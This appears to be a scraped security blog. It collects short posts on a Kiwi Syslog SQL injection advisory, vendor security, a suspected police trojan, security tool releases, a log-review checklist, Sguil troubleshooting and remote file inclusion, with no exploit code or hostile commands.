Kiwi Syslog Web Access 1.4.4 SQL Injection & Blind SQL Injection

Product: Kiwi Syslog Web Access
Version: 1.4.4
Vendor: http://www.kiwisyslog.com/kiwi-syslog-server-overview/
Vulnerability type: SQL Injection and Blind SQL Injection
Risk level: High
Vendor notification: 2012-12-18
Tested on: Windows 2003
Author: Mohd Izhar Ali

Kiwi Syslog Web Access version 1.4.4 suffers from remote SQL injection and blind SQL injection vulnerabilities.

You can download here:
http://packetstormsecurity.org/files/118945/Kiwi-Syslog-Web-Access-1.4.4-SQL-Injection.html

Vendor Security

I’d like to share our experiences with vendor security since I’m sure it’s something that impacts all of us. Like every company, Rapid7 relies on a number of technology vendors for a huge range of products and services to run the business. I’m sure no one will be surprised to hear that as a security company we have a policy specifying the security requirements that our vendors need to meet before we’ll do business with them. Our view is that their security directly impacts any of our internal or customer data that their systems hold, so we take it as seriously as our own infrastructure security. Most or all of you probably have the same approach, but one unique thing that we have at our disposal is a number of highly skilled security experts on staff which allows us to have a mandatory application security assessment as part of our policy.

The results of this policy over the last few years have been eye-opening.  The number of prospective vendors that pass our security bar is disappointingly low, across every category we used (marketing tools, sales tools, support tools, file transfer tools, IT infrastructure, etc). The most recent failure sparked this blog post, but it was the norm rather than the exception. More often than not they fail basic tests with numerous readily apparent and easily exploitable issues. If the vendor has a great product or service that we think is significantly better than the alternatives we evaluated, we’ll delay our deployment while we engage with them to address the issues we found, getting commitments to fix in a defined timeline. The results there have been equally dismal, with most of them missing their commitments and forcing us to end up going with an alternate months later. It’s clear that our security bar is far higher than their bar, but also that in many cases they don’t have either the desire or skills to significantly improve their security.

All of this ends up slowing our deployment of the various third party solutions, which is an acceptable tradeoff in our view. But what do we do when none of the vendors in the space pass the security bar? And more broadly, what can we do as a security community to raise awareness of the state of vendor security and create impetus for change?  Our individual efforts to push the vendors we’ve engaged with generally haven’t been enough to move the ball. If you have any suggestions on how we can tackle this as a community, please post them below.

In the meantime, I thought I’d share our own approach in case it’s useful to any of you. The overall approach we use is a coordinated process between procurement, legal, and IT security. Having a coordinated process between the business discussion and technical due diligence allows for not just improved decision making, but also more informed negotiation.

1. First, in addition to screening new vendors, if you haven’t already been doing this, start by pulling together a list of all your existing vendors (particularly SaaS vendors that have an exposed security surface). This will be eye-opening the first time you do it, since lots of groups will have been using tools without any IT involvement.
   • One useful tactic we use to find out what’s in use and catch new ad-hoc “deployments” that bypass your vetting process is a periodic review of corporate credit card statements, flagging expenses associated with known vendors & SaaS providers.
2. Use a security questionnaire to understand their security policies, processes, and sophistication.
3. Demand to see the results of their latest security audit, showing what was tested, the findings, and the remediation they’ve done since that time. (We do an audit ourselves because we can). Negotiate for rights to this on a periodic basis.
4. Pay close attention to audit logging functionality. Does the SaaS application track and report on login/logout, user actions within the application, and does it track source IP address? At the very least, you will want to conduct periodic reviews of the account logs to check for anomalies.
5. Scrutinize the identity management capabilities and set a policy for how they are used. Access management, particularly account management, is one of the weakest areas of SaaS security today. Multiple users are often tempted to share accounts because account limits are common to SaaS: this practice needs to be discouraged. Organizational password strength and password rotation policies are usually difficult to enforce when it comes to SaaS. Account provisioning and de-provisioning usually happens outside the IT group, and sometimes there are multiple users on a SaaS application with the ability to create accounts but no single user with clear ownership of, and responsibility for, the application. This creates a substantial risk that accounts will not be revoked in a timely fashion upon a change in employment status. Some approaches that can mitigate the issue:
   • Ensure that IT is solely responsible for account management in all SaaS applications.
   • Conduct periodic reviews of active SaaS accounts across all applications, matching to current employee rosters.
   • Work with your SaaS provider to enact IP-level restrictions to all logins, so that employees are required to be either physically present in the office or connected to the VPN to log in to the SaaS application. This will require the VPN to operate in “full tunnel” mode, where all traffic (including internet traffic) is driven over the VPN to egress from the corporate network.
6. Most SaaS applications allow you to grant different levels of permissions to different users. As much as possible, place reasonable limits on user access levels in SaaS applications. Restrict manager privileges to as few accounts as possible

As companies increasingly rely on SaaS solutions to do every day business, and security moves even further outside of your control, it becomes more and more important to proactively ensure the security and integrity of the solution you rely on. Employing a number of these suggestions, when considering your SaaS solutions, will help put you on the road to a higher level of security serving both your internal stakeholders and customers well.

Article from Rapid7 Blog:

https://community.rapid7.com/community/infosec/blog/2011/12/06/vendor-security

Backdoor Trojan alleged to have been created and used by German law enforcement authorities

Under German law, the police are allowed to use spyware to snoop on suspected criminals – but only under strict guidelines. The spyware must not alter any code on the suspect’s computer and safeguards must be put in place to prevent the Trojan being subverted to include additional functionality.

The Chaos Computer Club (CCC) has announced the discovery of a backdoor Trojan horse that is capable of spying on online activity such as recording Skype conversations and monitoring online behaviour. The CCC implies that the malware was created for, and is being used by, German law enforcement authorities such as the BKA and LKA.

Sophos’s analysis of the malware confirms that it has the following functionality:
* The Trojan can eavesdrop on several communication applications - including Skype, MSN Messenger and Yahoo Messenger
* The Trojan can log keystrokes in Firefox, Opera, Internet Explorer and SeaMonkey
* The Trojan can take JPEG screenshots of what appears on users' screens and record Skype audio calls
* The Trojan attempts to communicate with a remote website

“While it’s not possible to *prove* who authored the malware, it’s beginning to look more and more likely that the German authorities were involved,” said Graham Cluley, senior technology consultant at Sophos. “The malware targets Windows computers and to become infected, you typically might receive an email containing an attached file, or a link to the web which would then infect the computer. SophosLabs detects all malware that we know about – regardless of who the author might be. So whether this malware is state-sponsored or not, we’ve added protection against this attack.”

 Source: SecurityPark

HITB SecConf2011 Malaysia (October 10 to 13)

Run as a not for profit, community backed effort, the Hack in The Box Security Conference (HITBSecConf) series has become the ‘must attend’ event in the calendars of security professionals from around the world.
Having started as a small gathering of Malaysian security specialists in 2002, the event has since expanded out of its home base in Kuala Lumpur to Dubai and in 2010, The Netherlands. Our events are put together by a team of dedicated crew and volunteers and through the continued support of our sponsors, HITBSecConf has grown into the largest network security conference in the Asia Pacific and Middle East region!
The main aim of our conferences has always been to enable the dissemination, discussion and sharing of deep knowledge network security information. Our main focus is on new and groundbreaking attack and defense methods that have not been seen or discussed in public before. HITBSecConf events bring together a unique mix of security professionals, researchers, law enforcement and members of the hacker underground under one roof and our flagship event in Malaysia sees over 1000 attendees.
The event runs over a 4 day period with 2 days of intensive hands on training sessions followed by a two-day conference with either three or four concurrent tracks inclusive of a hands on lab session (HITB Labs) and 15 minute lightning talks (HITB SIGINT). The HITB Labs caters for only 50-100 attendees and these sessions are intensive, hands-on presentations that require audience interaction. The HITB SIGINT (Signal Intelligence/Interrupt) sessions on the other hand, are designed to provide a quick 15 minute overview for material and research that's 'up and coming' - stuff that isn't quite ready for the mainstream tracks of the conference but deserve a mention nonetheless.
In addition to the conference tracks, our events are also further enhanced with an open-to-public technology and exhibition area, lock picking villages, hackerspace villages and of course, our ever popular Capture The Flag competition (CTF) !

For more information about agenda and speaker, please see the link below:
http://conference.hitb.org/hitbsecconf2011kul/

Xplico 0.5.7: VoIP tapping and phone numbers

The goal of Xplico is extract from an internet traffic capture the applications data contained. For example, from a pcap file Xplico extracts each email (POP, IMAP, and SMTP protocols), all HTTP contents, each VoIP call (SIP), and so on. 

This release introduces improvements in the SIP and RTP dissectors. In this version was also added the RTCP dissector, with this dissector Xplico is able to obtain the phone numbers of the caller and called party (obviously only if present in the RTCP packets). DEFT 5.1 Live distribution contains this version.
You can download source code and Ubuntu 10.04 package here.

More about Xplico:
http://sourceforge.net/projects/xplico/files/
http://www.xplico.org/

Suricata – Open Source Next Generation Intrusion Detection and Prevention Engine

The Suricata Engine is an Open Source Next Generation Intrusion Detection and Prevention Engine. This engine is not intended to just replace or emulate the existing tools in the industry, but will bring new ideas and technologies to the field.

Basically it’s a is a multi-threaded intrusion detection/prevention engine engine available from the Open Information Security Foundation. OISF is part of and funded by the Department of Homeland Security’s Directorate for Science and Technology HOST program (Homeland Open Security Technology), by the the Navy’s Space and Naval Warfare Systems Command (SPAWAR), as well as through the very generous support of the members of the OISF Consortium. More information about the Consortium is available, as well as a list of our current Consortium Members.The Suricata Engine and the HTP Library are available to use under the GPLv2.

The HTP Library is an HTTP normalizer and parser written by Ivan Ristic of Mod Security fame for the OISF. This integrates and provides very advanced processing of HTTP streams for Suricata. The HTP library is required by the engine, but may also be used independently in a range of applications and tools.
You can download Suricata v0.9 here:
http://www.openinfosecfoundation.org/download/suricata-0.9.0.tar.gz

For more details, please refer here:
http://www.openinfosecfoundation.org/

CRITICAL LOG REVIEW CHECKLIST FOR SECURITY INCIDENTS

This cheat sheet presents a checklist for reviewing critical logs when responding to a security incident. It can also be used for routine log review. To download it, click here:
http://www.securitywarriorconsulting.com/security-incident-log-review-checklist.pdf


General Approach

• Identify which log sources and automated tools you can use during the analysis.
• Copy log records to a single location where you will be able to review them.
• Minimize “noise” by removing routine, repetitive log entries from view after confirming that they are benign.
• Determine whether you can rely on logs’ time stamps; consider time zone differences.
• Focus on recent changes, failures, errors, status changes, access and administration events, and other events unusual for your environment.
• Go backwards in time from now to reconstruct actions after and before the incident.
• Correlate activities across different logs to get a comprehensive picture.
• Develop theories about what occurred; explore logs to confirm or disprove them.

Typical Log Locations

• Linux OS and core applications: /var/log
• Windows OS and core applications: Windows Event Log (Security, System, Application)
• Network devices: usually logged via Syslog; some use proprietary locations and formats.

What to Look for on Linux

• Successful user login- “Accepted password”, “Accepted publickey”, "session opened”
• Failed user login- “authentication failure”, “failed password”
• User log-off- “session closed”
• User account change or deletion- “password changed”, “new user”, “delete user”
• Sudo actions- “sudo: … COMMAND=…”, “FAILED su”
• Service failure- “failed” or “failure”

What to Look for on Windows
Event IDs are listed below for Windows 2000/XP. For Vista/7 security event ID, add 4096 to the event ID.Most of the events below are in the Security log; many are only logged on the domain controller.

• User logon/logoff events -Successful logon 528, 540; failed logon 529-537, 539; logoff 538, 551, etc
• User account changes- Created 624; enabled 626; changed 642; disabled 629; deleted 630
• Password changes- To self: 628; to others: 627
• Service started or stopped- 7035, 7036, etc.
• Object access denied (if auditing enabled)- 560, 567, etc

What to Look for on Network Devices
Look at both inbound and outbound activities. Examples below show log excerpts from Cisco ASA logs; other devices have similar functionality.

• Traffic allowed on firewall- “Built … connection”, “access-list … permitted”
• Traffic blocked on firewall- “access-list … denied”, “deny inbound”; “Deny … by”
• Bytes transferred (large files?)- “Teardown TCP connection … duration … bytes …”
• Bandwidth and protocol usage- “limit … exceeded”, “CPU utilization”
• Detected attack activity- “attack from”
• User account changes- “user added”, “user deleted”, “User priv level changed”
• Administrator access- “AAA user …”, “User … locked out”, “login failed”

What to Look for on Web Servers

• Excessive access attempts to non-existent files
• Code (SQL, HTML) seen as part of the URL
• Access to extensions you have not implemented
• Web service stopped/started/failed messages
• Access to “risky” pages that accept user input
• Look at logs on all servers in the load balancer pool
• Error code 200 on files that are not yours
• Failed user authentication- Error code 401, 403
• Invalid request- Error code 400
• Internal server error- Error code 500 

Other Resources

• Windows event ID lookup: www.eventid.net
• A listing of many Windows Security Log events: http://www.ultimatewindowssecurity.com/securitylog/encyclopedia/Default.aspx
• Log analysis references: www.loganalysis.org
• A list of open-source log analysis tools: securitywarriorconsulting.com/logtools
• Anton Chuvakin’s log management blog: securitywarriorconsulting.com/logmanagementblog
• Other security incident response-related cheat sheets: zeltser.com/cheat-sheets

How to choose your Information Security Training

Article taken from: http://www.offensive-security.com/blog/offsec/questions-information-security-training-provider/

In the past couple of years, the economy has struck hard on organizations seeking to educate their employees. Training budgets have been cut down, and choosing the right course that will give you real Return on Investment is not an easy job. This is especially true in the offensive InfoSec arena, where training standards and qualifications are weakly defined. So how can you make sure your getting your money’s worth ?

Welcome to our “10 questions you should be asking your InfoSec Training Provider“.

1. What are the objectives of the training ?

What will the training do for you ? Anyone promising you that you will be a “hardcore penetration tester” or a “security expert” after their 5 day class has never run a pentest, or otherwise has no clue what they are talking about. Learning *any* profession in 5 days is unrealistic, let alone one as complex as IT Security, or penetration testing. This is one of the first questions I ask before attending a training… its allows me to set my goals for the course and gives me a baseline for my expectations.

2. What topics does the course cover ?

Always read the syllabus of the course you want to attend, before you attend it.  Try finding other people who have taken the class, (if possible) and get their opinion. Try to see if the syllabus follows a reasonable methodology, or if it’s just a collection of topics. If you see a list of 1500 tools on the syllabus – expect to spend around 0.6 minutes per tool. 

3. Who is your trainer ?

Are they well known in their field ? Do they have training experience ? Are they involved in the security community ? Do they practice what they preach? Although these are 4 separate questions, they all relate to one thing – the ability of the trainer to provide the goods you paid so dearly for. Finding a GOOD InfoSec trainer is NOT easy. Most computer genii are usually lacking in their social skills – something a good trainer must have.

4. What previous reviews does the class have ?

Running a few internet searches for the name of your class, or the name of the trainer is a must. Find out what people have to say about their experiences – during and after the class. Although you can’t believe *everything* on the internet, taking an average of all the reviews will usually give you a solid idea of what you are getting into.

5. What is the ratio of students to trainers ?

How many students will there be in the class ? Some training providers cram more than 30 students in one class – often with a single instructor. During a 5 day period, a trainer can’t give personal attention to 30 people, no matter what. In general, smaller classes mean a more intimate environment, more attention from the trainer, and a more productive and engaging experience.

6. What is the ratio between theory and hands-on exercises ?

Remember the famous saying “In theory, there is no difference between theory and practice – But in practice, there is”. If you don’t exercise what you learn, you are less likely to retain or understand it as nothing replaces practical experience. Ask for a rough ratio estimate for “theory VS exercise” for your class – anything above 40% class-time spent on exercises is a good sign. Of course, this greatly depends on the quality of the exercises too.

7. How often is the course updated ? Is the material relevant to modern day situations ?

Learning methods and techniques on antiquated systems will bring you little benefit in the real world. Hacking a Windows 2000 SP4 machine with RCP DCOM doesn’t cut it any more. On the other hand, don’t expect to learn “Bypassing Windows 7 Stack Protection” in an introductory buffer overflows course. You need to gauge the balance between these two elements carefully.

8. What are the pre-requisites for the class ?

How should you prepare yourself for the class? Do you need to refresh your knowledge on certain topics? Nothing is more frustrating than coming to a class, and then lagging behind because you are not up to par with the class requirements. Not good for your learning experience, and not good for your self esteem – on the other hand “no pre-requisites required” might indicate lack of depth. If the pre-requisites were defined well by the training provider, it’s definitely a good resource to use to evaluate the relevancy of the course to you.

9. Is there a certification involved ? What is it’s value ?

The “value” of a certification can be measured in the real world using two main indicators:

• The “market value” of the certification – how popular is this certification in the workforce ? Is the certificate recognized and appreciated by the industry ? And of course, will it help you get a (better) job ?

• The “practical value” of the certification – or as Eddie Murphy would say “WHAT HAVE YOU DONE FOR ME LATELY?”.  What real world skills does the certificate prove? If it proves you can memorize 100 questions, you might not be up to the job when confronted with a real world scenario.

10. What post training benefits are provided?

What ongoing benefits will you get from the training provider, if any ? Is there a continuation path for the training ? Will the trainers be available for future questions or issues that may arise ? Is there a student community you can join, to discuss the course with other student ? Or in other words, what kind of “post customer service” can you expect ?

These 10 questions should cover all the important elements you should verify before committing your valuable time and limited training budget to any service provider. The average person only gets a limited number of training opportunities per year, therefore you should always maximize the return you receive.

NSMnow – 1.5.0

NSMnow 1.5 series sees the initial completed feature set for Fedora, RHEL and CentOS systems. This is excellent news for those who have wanted to have, use, test an NSM configuration for themselves but were daunted by the process of doing from scratch.

With this being initial release for support to Fedora, RHEL, and CentOS systems there is bound to be some teething problems. So as long as you submit the bug reports, we will fix them and NSMnow will continue to get even better, if that’s possible.

Download:http://www.securixlive.com/nsmnow/download.php

Fuzzgrind

Fuzzgrind is a fully automatic fuzzing tool, generating test files with the purpose of discovering new execution paths likely to trigger bugs and potentially vulnerabilities.

It is based on the concept of symbolic execution. Thus, the tool starts from a file considered valid by the software under test, and analyses the execution path to extract any constraints tied to branch instructions followed by this software. By resolving constraints one by one, Fuzzgrind will alter the valid file to explore possible new branches of the software under test, in order to discover new vulnerabilities.

Fuzzgrind is licensed under the terms of the GNU GPL. Anybody is welcome to contribute!

Metasploit 3.2

The Metasploit Framework is a development platform for creating security tools and exploits. It's used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide.

Compare to Metasploit 3.0, in Metasploit 3.2, getting attack code onto a target machine will also be easier on Metasploit 3.2 with improvements to the Raw Packet Tools function. A new library call PacketFu is expected by Moore to achieve packet injection for both wired and wireless end points.It also provides improved support for exploiting multi-core CPU machines, which had been more difficult to attack with previous versions of Metasploit.

Metasploit is also able to take exploit code and weaponize it in an .EXE (executable file) that can be deployed by an attacker. Moore said the EXE template that created EXE attacks has been improved in Metasploit 3.2 in order to defeat AntiVirus vendor signature detection.

If you never try metasploit, you can download it here.

SecurixNSM 1.3

Securix-NSM is the successor of Knoppix-NSM. It's an extension of our NSMnow technology which has been integrated with the universal Debian foundation with a range of other tools to work from. Like it's predecessor Securix-NSM is dedicated to providing a framework for individuals wanting to learn about Network Security Monitoring (NSM) or who want to quickly and reliably deploy a NSM capability in their network.

Securix-NSM is now based on Debian Live, which means that you can test all the tools in a live Debian session running on the CD without the need for a HardDisk Drive (HDD) installation.

You can download ISO here.

NSMnow 1.3

NSMnow is all about building an Network Security Monitoring (NSM) framework . It's very fast and easy without the messy patching and configuration of each tool needed to get the system up and running. It is build a sguil system with the minimum amount of fuss so you can actually focus on using sguil instead of building it.
More details, see this site: http://www.securixlive.com/
If you want to download: here

Hex 2.0 Release!!

HeX is a project aimed at the NSM (Network Security Monitoring) community for use by network security analysts. The developers believe that simplicity and analysis work flow logic must be enhanced and emphasized through-out the process of designing this liveCD. Not only have they carefully chosen all the necessary applications and tools to be included to the liveCD, they have also tested them to make sure everything running as smooth as possible. In order to summarize the objective of HeX, they are trying to develop the first and foremost Network Security Monitoring & Network Based Forensics liveCD!

You can find information about Hex 2.0 here:
http://www.rawpacket.org/projects/hex/hex-livecd/version-20-release

Port 443

SANS inform that there is a significant increase in port 443 scans. They said if you see attacks against https servers, please let them know. If you see something like that, I think you can send your web server logs/IDS logs/Firewall logs to them to confirm whether there is an attack or not.
http://isc.sans.org/diary.html?storyid=2673

Last year, I got the same problems at my client site. One of my team reported to my Security Consultant that she detected series of Attack Response alerts from our Snort IDS. This alert involves 443 port (https). So we analyzed that alert and checked the source IP because the 443 service comes from that source IP. After analyzing that alert, we confirmed that there is no SSL/https related services available on the source IP. It looks like a normal website. There is no https service available on that IP. If there is https service, it should be encrypted. We want to analyze details and make decision about that alert, but we didn't have more resources. Maybe attacker was compromised earlier and installed backdoor/trojan/malware at that IP and used it to communicate through 443 port? Or maybe misconfiguration?? See this link:
http://blog.hazrulnz.net/121/finally-2.html

From my experience, this question is not easy to answer if you only have Snort alerts. It will make this question too difficult to answer. Looking at the alerts, there is nothing else we can do. You cannot give right answer to this question.

That's why I like to use Sguil. Sguil is an open source suite for performing NSM (Network Security Monitoring). NSM equips security staff to deal with the inevitable consequences of too few resources and too many responsibilities. NSM collects the data needed to generate better assessment, detection, and response processes, resulting in decreased impact from unauthorized activities.

Sguil Problem

Today, I got problem with my Sguil machine. When I want to run Sguil script, i got this error, "Table `event` is marked as crashed and should be repaired".















I checked the error message with dmesg to find out the problem:














After that, I'm trying to restart sguild script, but I got same error. At the same time, I remember TaoSecurity posting about MYSQL problem. I try to search from TaoSecurity blog and I found this link:
http://taosecurity.blogspot.com/2007/03/recovering-from-corrupted-mysql.html

I run this mysqlcheck command like this:
izhar/root #mysqlcheck -r sguildb -p
Enter password















After running mysqlcheck, I try to start sguild script again, but it still not working. I reboot my FreeBSD 6.1. and go to maintenance mode. I run fsck command to check file system consistency and interactively repairs the file system:
#fsck














After running fsck command, i reboot my Sguil machine and trying to run again my Sguil. Everything work without any errors. So I can used back my Sguil machine.

Conclusion: Shutdown your Sguil machine properly. Hehehe, yesterday I forgot to shutdown it and immediately closed my VMware Sguil without shutdown it.

Analysis of Remote File Inclusion Attempts

This is an analysis from SANS diary about Remote File Inclusion attempt:
http://isc.sans.org/diary.html?storyid=2462

Remote file inclusion is one of the latest and popular attack technique used by an attacker to attack a website from a remote computer. If your server are vulnerable to web applications that allow an attacker to execute remote file inclusion, it's very easy for attacker take over your server remotely .

PHP application is one of the applications that always vulnerable which allow an attacker to execute remote file inclusion to website. The reason of this PHP issue are:

• Insufficient validation of user input prior to dynamic file system calls, such as require or include or fopen()
• allow_url_fopen and PHP wrappers allow this behavior by default, which is unnecessary for most applications
• Poor permissions and planning by many hosters allowing excessive default privileges and wide ranging access to what should be off limits areas.

If you want to find more information about PHP remote code execution, you can refer to this:
http://www.owasp.org/index.php/PHP_Top_5#P1:_Remote_Code_Execution

Deformed TCP Options - Got Packets?

I got this article from SANS. This is about TCP packet analysis. The analysis said that scan maybe to probe firewall configuration, but it seem the level of crafting involved would be overkilled. I'm still new in packet analysis. I think i sould improve my knowledge aabout TCP packet attack.
http://isc.sans.org/diary.html?storyid=2328

Avoid these five common IDS implementation errors

Intrusion Detection Systems can go a long way to keep hackers from penetrating your network. However, they can only work if you properly set them up. Here are five common errors and how you can avoid them:

• Ignoring frequent false positives
• Avoiding IPSec to support NIDS
• Monitoring only inbound connections
• Using shared network resources to gather NIDS data
• Trusting IDS analysis to non-expert analysts

You can read full article:
http://articles.techrepublic.com.com/5100-6350-5785230.html

Five Mistakes of Security Log Analysis

In DoD Cybercrime Conference 2007 in St. Louis, Missouri, Anton Chuvakin gave a talk about the "Five Mistakes of Security Log Analysis". Anton talks about operational security challenges that organizations face while deploying log and alert collection and analysis infrastructure. You can refer here for his simple presentation.
You also can refer to his previous article for Computerworld. I think this article is useful for us. Chuvaking highlights the top five most common mistakes organizations make in this process:
1: Not looking at the logs
2: Storing logs for too short a time
3: Not normalizing logs
4: Failing to prioritize log records
5: Looking for only the bad stuff

p/s: I think NSM is one of the solution for this five mistakes to reduce problems for my IDS that i'm still using it......hehehhee....